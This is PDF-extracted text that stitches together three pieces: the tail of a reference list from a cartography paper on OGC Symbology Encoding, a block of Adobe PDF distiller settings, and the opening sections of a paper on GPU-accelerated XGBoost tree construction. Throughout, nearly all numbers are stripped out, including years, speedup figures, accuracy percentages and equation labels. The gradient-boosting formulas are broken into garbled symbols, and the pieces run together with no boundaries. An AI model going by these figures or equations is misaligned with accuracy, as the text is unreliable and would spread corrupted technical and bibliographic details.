ogc styled layer descriptor (sld) for thematic cartography— towards the ubiquitous use of advanced mapping functions through standardized visualization rules. in: th international symposium on lbs and telecartography, hong kong. duarte teixeira m, de melo cuba r, mizuta weiss g. . creating thematic maps with ogc standards through the web. in: proceedings of the gml and geo-spatial web services conference, vancouver. lemmer, the netherlands: gim international. environmental protection agency (epa). . guidance note for strategic noise mapping: guidance note for strategic noise mapping for the environmental noise regulations . technical report. wexford: environmental protection agency. available at https://www.epa.ie/ pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf (accessed september ). ertz o. . feasibility study about swiss geological symbols using the system-independent ogc sld/se standards. technical report. available at https://drive.switch.ch/index.php/s/ d aftdeaslej wa (accessed september ). ertz o, bocher e. . styled layer descriptor and symbology encoding . swg. technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/ projects/groups/sldse . swg (accessed september ). ertz o, julien lg, bocher e. . collaborative authoring and polypublication of cartographic content. in: ertz o, joost s, tonini m, eds. in: ogrs symposium proceedings. yverdon-les-bains: ogrs. ertz o, rey sj, joost s. . the open source dynamics in geospatial research and education. journal of spatial information science : – doi . /josis. . . . eurostat/regional statistics. . population on january by broad age group, sex and nuts region, females, total. available at http://ec.europa.eu/eurostat (accessed september ). field k. . a cacophony of cartography. cartographic journal ( ): – doi . / z. . geoserver. . geoserver . .x user manual. available at http://docs.geoserver.org/stable/en/ user/styling/ysld/index.html (accessed september ). hopfstock a, grünreich d. . a user-oriented map design in the sdi environment using the example of a european reference map at medium scale. in: proceedings of the th international cartographic conference. santiago de chile: icc. inspire drafting team. . d . : methodology for the development of data specifications. available at http://inspire.ec.europa.eu/reports/implementingrules/dataspecifications/d . _v . .pdf (accessed september ). inspire drafting team. . d . : generic conceptual model. available at http://inspire.ec. europa.eu/documents/data_specifications/d . _v . .pdf (accessed september ). inspire thematic working group geology. . d . .ii. inspire data specification on geology—technical guidelines. available at http://inspire.ec.europa.eu/id/document/tg/ge (accessed september ). iosifescu-enescu i. . se implementation specification change request—extensions for thematic mapping (ogc cr - ). technical report. wayland: open geospatial consortium, bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://portal.opengeospatial.org/files/?artifact_id= http://portal.opengeospatial.org/files/?artifact_id= http://portal.opengeospatial.org/files/?artifact_id= http://portal.opengeospatial.org/files/?artifact_id= https://www.epa.ie/pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf https://www.epa.ie/pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf https://www.epa.ie/pubs/advice/noisemapping/epa% guidance% note% for% strategic% noise% mapping% (version% ).pdf https://drive.switch.ch/index.php/s/d aftdeaslej wa https://drive.switch.ch/index.php/s/d aftdeaslej wa http://www.opengeospatial.org/projects/groups/sldse . swg http://www.opengeospatial.org/projects/groups/sldse . swg http://dx.doi.org/ . /josis. . . http://ec.europa.eu/eurostat http://dx.doi.org/ . / z. http://docs.geoserver.org/stable/en/user/styling/ysld/index.html http://docs.geoserver.org/stable/en/user/styling/ysld/index.html http://inspire.ec.europa.eu/reports/implementingrules/dataspecifications/d . _v . .pdf http://inspire.ec.europa.eu/documents/data_specifications/d . _v . .pdf http://inspire.ec.europa.eu/documents/data_specifications/d . _v . .pdf http://inspire.ec.europa.eu/id/document/tg/ge http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ inc. available at https://portal.opengeospatial.org/files/?artifact_id= (accessed september ). iosifescu-enescu i, hugentobler m, hurni l. . web cartography with open standards—a solution to cartographic challenges of environmental management. environmental modelling & software ( ): – doi . /j.envsoft. . . . iosifescu-enescu i, hurni l. . towards cartographic ontologies or how computers learn cartography. in: proceedings of the th international cartographic conference. moscow: icc. international organization for standardization (iso). . iso : —geographic information—portrayal. available at https://www.iso.org/standard/ .html. lalonde w. . styled layer descriptor profile of the web map service implementation specification (ogc - ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/sld (accessed september ). lonjon a, thomasson j-j, maesano l. . modélisation xml. architecte logiciel. eyrolles edition. paris: eyrolles. lupp m. . styled layer descriptor profile of the web map service implementation specification (ogc - r ). wayland: open geospatial consortium, inc. maceachren am. . how maps work—representation, visualization, and design. new york: guilford press. macwright t. . the end of cartocss. available at https://blog.mapbox.com/the-end-of-cartocss- da d cf (accessed september ). mapbox. . cartocss. available at https://carto.com/docs/carto-engine/cartocss (accessed september ). maxence l, olivier e, erwan b, sylvain p. . ogc se custom jaxb. available at https://github. com/orbisgis/ogc-custom-jaxb (accessed september ). mays j. . using sld definitions to display charts in a deegree wms. in: foss g conference. cape town: open source geospatial foundation. mckenna j. . mapserver . . documentation: ogc support and configuration. available at http://mapserver.org/ogc/sld.html (accessed september ). mcmaster r, mcmaster s. . a history of twentieth-century american academic cartography. cartography and geographic information science ( ): – doi . / . montello dr. . cognitive map-design research in the twentieth century: theoretical and empirical approaches. cartography and geographic information science ( ): – doi . / . müller m. . styled layer descriptor profile of the web map service implementation specification (ogc - r ). wayland: open geospatial consortium, inc. nicolas l, christine z. . espon cartographic language—mapping guide. technical report. paris: ums riate, université paris diderot. available at http://f.hypotheses.org/wp-content/ blogs.dir/ /files/ / /task _final_ecl_mappingguide_dec .pdf (accessed september ). openstreetmap. . mapcss . . available at http://wiki.openstreetmap.org/wiki/mapcss/ . (accessed september ). ort e, mehta b. . java architecture for xml binding (jaxb). available at http://www.oracle. com/technetwork/articles/javase/index- .html (accessed september ). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://portal.opengeospatial.org/files/?artifact_id= http://dx.doi.org/ . /j.envsoft. . . https://www.iso.org/standard/ .html http://www.opengeospatial.org/standards/sld https://blog.mapbox.com/the-end-of-cartocss-da d cf https://blog.mapbox.com/the-end-of-cartocss-da d cf https://carto.com/docs/carto-engine/cartocss https://github.com/orbisgis/ogc-custom-jaxb https://github.com/orbisgis/ogc-custom-jaxb http://mapserver.org/ogc/sld.html http://dx.doi.org/ . / http://dx.doi.org/ . / http://f.hypotheses.org/wp-content/blogs.dir/ /files/ / /task _final_ecl_mappingguide_dec .pdf http://f.hypotheses.org/wp-content/blogs.dir/ /files/ / /task _final_ecl_mappingguide_dec .pdf http://wiki.openstreetmap.org/wiki/mapcss/ . http://www.oracle.com/technetwork/articles/javase/index- .html http://www.oracle.com/technetwork/articles/javase/index- .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ osgi. . the osgi alliance osgi core. technical report. san ramon: osgi alliance. available at https://osgi.org/download/r /osgi.core- . . .pdf (accessed september ). peterson gn. . gis cartography: a guide to effective map design. first edition. boca raton: crc press. policy swg. . the specification model—a standard for modular specifications (ogc - r ). technical report. wayland: open geospatial consortium, inc. available at http://www. opengeospatial.org/standards/modularspec (accessed september ). portele c. . opengis� geography markup language (gml) encoding standard, version . . (ogc - ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/gml (accessed september ). rita e, borbinha j, martins b. . extending sld and se for cartograms. in: gsdi world conference. singapore: global spatial data infrastructure association. sae-tang a, ertz o. . towards web services dedicated to thematic mapping. osgeo journal : – . schnabel o, hurni l. . diagram markup language—a new model for symbolization in internet maps. in: proceedings of the th international cartographic conference. moscow: icc. slocum ta, macmaster rb, kessler fc, howard hh. . thematic cartography and geovisualization. third edition. upper saddle river: pearson education. steiniger s, hunter ajs. . free and open source gis software for building a spatial data infrastructure. berlin: springer, – . sykora p, schnabel o, enescu ii, hurni l. . extended cartographic interfaces for open distributed processing. cartographica: the international journal for geographic information and geovisualization ( ): – doi . /carto. . . . tóth k, portele c, illert a, lutz m, nunes de lima m. . a conceptual model for developing interoperability specifications in spatial data infrastructures. luxembourg: european commission joint research centre. tyner ja. . principles of map design. new york: guilford press. van den brink l, portele c, vretanos pa. . geography markup language (gml) simple features profile—with corrigendum (ogc - r ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/gml (accessed september ). vretanos p. . opengis filter encoding . encoding standard (ogc - r and iso/dis ). technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/filter (accessed september ). vretanos pa. . filter encoding implementation specification. technical report. wayland: open geospatial consortium, inc. available at http://www.opengeospatial.org/standards/filter (accessed september ). wood d, fels j. . the power of maps. mappings. new york: guilford press. zipf a. . using styled layer descriptor (sld) for the dynamic generation of user- and context- adaptive mobile maps—a technical framework. berlin: springer, – . bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://osgi.org/download/r /osgi.core- . . .pdf http://www.opengeospatial.org/standards/modularspec http://www.opengeospatial.org/standards/modularspec http://www.opengeospatial.org/standards/gml http://dx.doi.org/ . /carto. . . http://www.opengeospatial.org/standards/gml http://www.opengeospatial.org/standards/filter http://www.opengeospatial.org/standards/filter http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a redesign of ogc symbology encoding standard for sharing cartography introduction from map design to portrayal interoperability open standards for sharing cartography proposals reference implementation conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice accelerating the xgboost algorithm using gpu computing accelerating the xgboost algorithm using gpu computing rory mitchell and eibe frank department of computer science, university of waikato, hamilton, new zealand abstract we present a cuda-based implementation of a decision tree construction algorithm within the gradient boosting library xgboost. the tree construction algorithm is executed entirely on the graphics processing unit (gpu) and shows high performance with a variety of datasets and settings, including sparse input matrices. individual boosting iterations are parallelised, combining two approaches. an interleaved approach is used for shallow trees, switching to a more conventional radix sort-based approach for larger depths. we show speedups of between � and � using a titan x compared to a core i cpu, and . � using a titan x compared to � xeon cpus ( cores). we show that it is possible to process the higgs dataset ( million instances, features) entirely within gpu memory. the algorithm is made available as a plug-in within the xgboost library and fully supports all xgboost features including classification, regression and ranking tasks. subjects artificial intelligence, data mining and machine learning, data science keywords supervised machine learning, gradient boosting, gpu computing introduction gradient boosting is an important tool in the field of supervised learning, providing state-of-the-art performance on classification, regression and ranking tasks. xgboost is an implementation of a generalised gradient boosting algorithm that has become a tool of choice in machine learning competitions. this is due to its excellent predictive performance, highly optimised multicore and distributed machine implementation and the ability to handle sparse data. despite good performance relative to existing gradient boosting implementations, xgboost can be very time consuming to run. common tasks can take hours or even days to complete. building highly accurate models using gradient boosting also requires extensive parameter tuning. in this process, the algorithm must be run many times to explore the effect of parameters such as the learning rate and l /l regularisation terms on cross validation accuracy. this paper describes and evaluates a graphics processing unit (gpu) algorithm for accelerating decision tree construction within individual boosting iterations in the single machine xgboost setting. gpus have been used to accelerate compute intensive tasks in machine learning and many other fields through the utilisation of their specialised simd architecture (coates et al., ; merrill & grimshaw, ). gpu-accelerated decision tree algorithms have been tried before with moderate success. our unique contributions are as follows. we describe a completely gpu-based implementation that scales to arbitrary numbers of leaf nodes and exhibits stable performance characteristics how to cite this article mitchell and frank ( ), accelerating the xgboost algorithm using gpu computing. peerj comput. sci. :e ; doi . /peerj-cs. submitted april accepted june published july corresponding authors rory mitchell, ramitchellnz@gmail.com eibe frank, eibe@cs.waikato.ac.nz academic editor charles elkan additional information and declarations can be found on page doi . /peerj-cs. copyright mitchell and frank distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ramitchellnz@�gmail.�com mailto:eibe@�cs.�waikato.�ac.�nz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ on a range of datasets and settings. we experiment with novel approaches to processing interleaved subsets of data on gpus and develop a massively parallel tree construction algorithm that natively handles sparse data. we also provide a feature complete implementation for classification, regression and learning to rank tasks in the open source xgboost library (https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu). background and related work we review the basic strategy of tree boosting for machine learning and revisit the derivation of the xgboost algorithm, before considering the execution model and memory architecture of gpus as well as languages and libraries for gpu computing. our gpu-based implementation makes extensive use of high-performance gpu primitives and we discuss these next. we briefly discuss the effect of using single-precision floating point arithmetic before reviewing related work on gpu-based induction of decision trees from data. tree boosting algorithms xgboost is a supervised learning algorithm that implements a process called boosting to yield accurate models. supervised learning refers to the task of inferring a predictive model from a set of labelled training examples. this predictive model can then be applied to new unseen examples. the inputs to the algorithm are pairs of training examples ð~x ; y Þ; ð~x ; y Þ � � � ð~xn; ynÞ where ~x is a vector of features describing the example and y is its label. supervised learning can be thought of as learning a function fð~xÞ ¼ y that will correctly label new input instances. supervised learning may be used to solve classification or regression problems. in classification problems the label y takes a discrete (categorical) value. for example, we may wish to predict if a manufacturing defect occurs or does not occur based on attributes recorded from the manufacturing process, such as temperature or time, that are represented in ~x. in regression problems the target label y takes a continuous value. this can be used to frame a problem such as predicting temperature or humidity on a given day. xgboost is at its core a decision tree boosting algorithm. boosting refers to the ensemble learning technique of building many models sequentially, with each new model attempting to correct for the deficiencies in the previous model. in tree boosting each new model that is added to the ensemble is a decision tree. we explain how to construct a decision tree model and how this can be extended to generalised gradient boosting with the xgboost algorithm. decision trees decision tree learning is a method of predictive modelling that learns a model by repeatedly splitting subsets of the training examples (also called instances) according to some criteria. decision tree inducers are supervised learners that accept labelled training examples as an input and generate a model that may be used to predict the labels of new examples. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to construct a decision tree, we start with the full set of training instances and evaluate all possible ways of creating a binary split among those instances based on the input features in ~x. we choose the split that produces the most meaningful separation of the target label y. different measures can be used to evaluate the quality of a split. after finding the ‘best’ split, we can create a node in the tree that partitions training instances down the left or right branch according to some feature value. the subsets of training instances can then be recursively split to continue growing the tree to some maximum depth or until the quality of the splits is below some threshold. the leaves of the tree will contain predictions for the target label y. for categorical labels, the prediction can be set as the majority class from the training instances that end up in that leaf. for regression tasks, the label prediction can be set as the mean of the training instances in that leaf. to use the tree for prediction, we can input an unlabelled example at the root of the tree and follow the decision rules until the example reaches a leaf. the unlabelled example can be labelled according to the prediction of that leaf. figure shows an example decision tree that can predict whether or not an individual owns a house. the decision is based on their age and whether or not they have a job. the tree correctly classifies all instances from table . decision tree algorithms typically expand nodes from the root in a greedy manner in order to maximise some criterion measuring the value of the split. for example, decision tree algorithms from the c . family (quinlan, ), designed for classification, figure example decision tree. table example training instances. instance age has job owns house n n y y y y n n n y y n mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use information gain as the split criterion. information gain describes a change in entropy h from some previous state to a new state. entropy is defined as hðtÞ ¼ � x y y pðyÞlogbpðyÞ where t is a set of labelled training instances, y ∈ y is an instance label and p(y) is the probability of drawing an instance with label y from t. information gain is defined as igðt; tleft; trightÞ ¼ ht � ðnleft=ntotalÞ � hðtleftÞ � ðnright=ntotalÞ � hðtrightÞ here tleft and tright are the subsets of t created by a decision rule. ntotal, nleft and nright refer to the number of examples in the respective sets. many different criteria exist for evaluating the quality of a split. any function can be used that produces some meaningful separation of the training instances with respect to the label being predicted. in order to find the split that maximises our criterion, we can enumerate all possible splits on the input instances for each feature. in the case of numerical features and assuming the data has been sorted, this enumeration can be performed in o(nm) steps, where n is the number of instances and m is the number of features. a scan is performed from left to right on the sorted instances, maintaining a running sum of labels as the input to the gain calculation. we do not consider the case of categorical features in this paper because xgboost encodes all categorical features using one-hot encoding and transforms them into numerical features. another consideration when building decision trees is how to perform regularisation to prevent overfitting. overfitting on training data leads to poor model generalisation and poor performance on test data. given a sufficiently large decision tree it is possible to generate unique decision rules for every instance in the training set such that each training instance is correctly labelled. this results in % accuracy on the training set but may perform poorly on new data. for this reason it is necessary to limit the growth of the tree during construction or apply pruning after construction. gradient boosting decision trees produce interpretable models that are useful for a variety of problems, but their accuracy can be considerably improved when many trees are combined into an ensemble model. for example, given an input instance to be classified, we can test it against many trees built on different subsets of the training set and return the mode of all predictions. this has the effect of reducing classifier error because it reduces variance in the estimate of the classifier. figure shows an ensemble of two decision trees. we can predict the output label using all trees by taking the most common class prediction or some weighted average of all predictions. ensemble learning methods can also be used to reduce the bias component in the classification error of the base learner. boosting is an ensemble method that creates mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ensemble members sequentially. the newest member is created to compensate for the instances incorrectly labelled by the previous learners. gradient boosting is a variation on boosting which represents the learning problem as gradient descent on some arbitrary differentiable loss function that measures the performance of the model on the training set. more specifically, the boosting algorithm executes m boosting iterations to learn a function f(x) that outputs predictions ŷ ¼ fðxÞ minimising some loss function lðy; ŷÞ. at each iteration we add a new estimator f(x) to try to correct the prediction of y for each training instance: fmþ ðxÞ ¼ fmðxÞ þ f ðxÞ ¼ y we can correct the model by setting f(x) to: f ðxÞ ¼ y � fmðxÞ this fits the model f(x) for the current boosting iteration to the residuals y - fm(x) of the previous iteration. in practice, we approximate f(x), for example by using a depth-limited decision tree. this iterative process can be shown to be a gradient descent algorithm when the loss function is the squared error: lðy; fðxÞÞ ¼ ðy � fðxÞÞ to see this, consider that the loss over all training instances can be written as j ¼ x i lðyi; fðxiÞÞ we seek to minimise j by adjusting f(xi). the gradient for a particular instance xi is given by dj dfðxiÞ ¼ d p i lðyi; fðxiÞÞ dfðxiÞ ¼ dlðyi; fðxiÞÞ dfðxiÞ ¼ fmðxiÞ � yi figure decision tree ensemble. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we can see that the residuals are the negative gradient of the squared error loss function: f ðxÞ ¼ y � fmðxÞ ¼ � dlðy; fðxÞÞ dfðxÞ by adding a model that approximates this negative gradient to the ensemble we move closer to a local minimum of the loss function, thus implementing gradient descent. generalised gradient boosting and xgboost herein, we derive the xgboost algorithm following the explanation in chen & guestrin ( ). xgboost is a generalised gradient boosting implementation that includes a regularisation term, used to combat overfitting, as well as support for arbitrary differentiable loss functions. instead of optimising plain squared error loss, an objective function with two parts is defined, a loss function over the training set as well as a regularisation term which penalises the complexity of the model: obj ¼ x i lðyi; ŷiÞ þ x k �ðfkÞ lðyi; ŷiÞ can be any convex differentiable loss function that measures the difference between the prediction and true label for a given training instance. Ω(fk) describes the complexity of tree fk and is defined in the xgboost algorithm (chen & guestrin, ) as �ðfkÞ ¼ �t þ �w ( ) where t is the number of leaves of tree fk and w is the leaf weights (i.e. the predicted values stored at the leaf nodes). when Ω(fk) is included in the objective function we are forced to optimise for a less complex tree that simultaneously minimises lðyi; ŷiÞ. this helps to reduce overfitting. �t provides a constant penalty for each additional tree leaf and �w penalises extreme weights. � and � are user configurable parameters. given that boosting proceeds in an iterative manner we can state the objective function for the current iteration m in terms of the prediction of the previous iteration ŷi ðm� Þ adjusted by the newest tree fk: objm ¼ x i lðyi; ŷiðm� Þ þ fkðxiÞÞ þ x k �ðfkÞ we can then optimise to find the fk which minimises our objective. taking the taylor expansion of the above function to the second order allows us to easily accommodate different loss functions: objm ’ x i ½lðyi; ŷiðm� ÞÞ þ gifkðxÞ þ hifkðxÞ � þ x k �ðfkÞ þ constant mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here, gi and hi are the first and second order derivatives respectively of the loss function for instance i: gi ¼ dlðyi; ŷiðm� ÞÞ dŷi ðm� Þ hi ¼ d lðyi; ŷiðm� ÞÞ dðŷiðm� ÞÞ note that the model ŷi ðm� Þ is left unchanged during this optimisation process. the simplified objective function with constants removed is objm ¼ x i ½gifkðxÞ þ hifkðxÞ � þ x k �ðfkÞ we can also make the observation that a decision tree predicts constant values within a leaf. fk(x) can then be represented as wq(x) where w is the vector containing scores for each leaf and q(x) maps instance x to a leaf. the objective function can then be modified to sum over the tree leaves and the regularisation term from eq. ( ): objm ¼ xt j¼ x i ij gi @ awqðxÞ þ x i ij hi @ aw qðxÞ þ �t þ � xt j¼ w here, ij refers to the set of training instances in leaf j. the sums of the derivatives in each leaf can be defined as follows: gj ¼ x i ij gi hj ¼ x i ij hi also note that wq(x) is a constant within each leaf and can be represented as wj. simplifying we get objm ¼ xt j¼ gjwj þ ðhj þ �Þw j � � þ �t ( ) the weight wj for each leaf minimises the objective function at @objm @wj ¼ gj þ ðhj þ �Þwj ¼ the best leaf weight wj given the current tree structure is then wj ¼ � gj hj þ � using the best wj in eq. ( ), the objective function for finding the best tree structure then becomes objm ¼ � xt j¼ g j hj þ � þ �t ( ) eq. ( ) is used in xgboost as a measure of the quality of a given tree. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ growing a tree given that it is intractable to enumerate through all possible tree structures, we greedily expand the tree from the root node. in order to evaluate the usefulness of a given split, we can look at the contribution of a single leaf node j to the objective function from eq. ( ): objleaf ¼ � g j hj þ � þ � we can then consider the contribution to the objective function from splitting this leaf into two leaves: objsplit ¼ � g jl hjl þ � þ g jr hjr þ � ! þ � the improvement to the objective function from creating the split is then defined as gain ¼ objleaf � objsplit which yields gain ¼ g l hl þ � þ g r hr þ � � ðgl þ grÞ hl þ hr þ � " # � � ( ) the quality of any given split separating a set of training instances is evaluated using the gain function in eq. ( ). the gain function represents the reduction in the objective function from eq. ( ) obtained by taking a single leaf node j and partitioning it into two leaf nodes. this can be thought of as the increase in quality of the tree obtained by creating the left and right branch as compared to simply retaining the original node. this formula is applied at every possible split point and we expand the split with maximum gain. we can continue to grow the tree while this gain value is positive. the � regularisation cost at each leaf will prevent the tree arbitrarily expanding. the split point selection is performed in o(nm) time (given n training instances and m features) by scanning left to right through all feature values in a leaf in sorted order. a running sum of gl and hl is kept as we move from left to right, as shown in table . gr and hr are inferred from this running sum and the node total. table shows an example set of instances in a leaf. we can assume we know the sums g and h within this node as these are simply the gl or gr from the parent split. therefore, we have everything we need to evaluate gain for every possible split within these instances and select the best. xgboost: data format tabular data input to a machine learning library such as xgboost or weka (hall et al., ) can be typically described as a matrix with each row representing an instance and each column representing a feature as shown in table . if f is the feature to be predicted then an input training pair ð~xi; yiÞ takes the form ((f i, f i), f i) where i is mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the instance id. a data matrix within xgboost may also contain missing values. one of the key features of xgboost is the ability to store data in a sparse format by implicitly keeping track of missing values instead of physically storing them. while xgboost does not directly support categorical variables, the ability to efficiently store and process sparse input matrices allows us to process categorical variables through one-hot encoding. table shows an example where a categorical feature with three values is instead encoded as three binary features. the zeros in a one-hot encoded data matrix can be stored as missing values. xgboost users may specify values to be considered as missing in the input matrix or directly input sparse formats such as libsvm files to the algorithm. xgboost: handling missing values representing input data using sparsity in this way has implications on how splits are calculated. xgboost’s default method of handling missing data when learning decision tree splits is to find the best ‘missing direction’ in addition to the normal threshold decision rule for numerical values. so a decision rule in a tree now contains a numeric decision rule such as f � . , but also a missing direction such as missing = right that sends all missing values down the right branch. for a one-hot encoded categorical variable where the zeros are encoded as missing values, this is equivalent to testing ‘one vs all’ splits for each category of the categorical variable. table enumerating splits. feature value . . . . . . gi . . . - . - . - . hi . . . . . . gl . . . . . - . hl . . . . . . table example data matrix. instance id f f f . . . . . . . . table sparse data matrix. instance id f f f mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the missing direction is selected as the direction which maximises the gain from eq. ( ). when enumerating through all possible split values, we can also test the effect on our gain function of sending all missing examples down the left or right branch and select the best option. this makes split selection slightly more complex as we do not know the gradient statistics of the missing values for any given feature we are working on, although we do know the sum of all the gradient statistics for the current node. the xgboost algorithm handles this by performing two scans over the input data, the second being in the reverse direction. in the first left to right scan the gradient statistics for the left direction are the scan values maintained by the scan, the gradient statistics for the right direction are the sum gradient statistics for this node minus the scan values. hence, the right direction implicitly includes all of the missing values. when scanning from right to left, the reverse is true and the left direction includes all of the missing values. the algorithm then selects the best split from either the forwards or backwards scan. graphics processing units the 